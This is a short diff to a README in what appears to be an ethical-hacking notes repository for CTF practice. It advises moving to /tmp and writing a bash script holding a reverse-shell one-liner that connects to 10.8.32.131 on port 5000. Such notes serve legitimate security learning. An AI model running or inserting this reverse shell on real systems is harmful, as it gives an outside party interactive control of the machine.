alessandro-ancona/Ethical-Hacking-Reporitory/README.md

 - **Metasploit**: sometimes banned from CTF environments

 In case not working, this is because you are in a non executable folder.
-Try to change folder to `/tmp` and create a bash script:
+Try to change folder to `/tmp` and create a bash script (also with execution permission):

       echo "bash -c 'bash -i >& /dev/tcp/10.8.32.131/5000 0>&1'" > /tmp/shell.sh

       Then: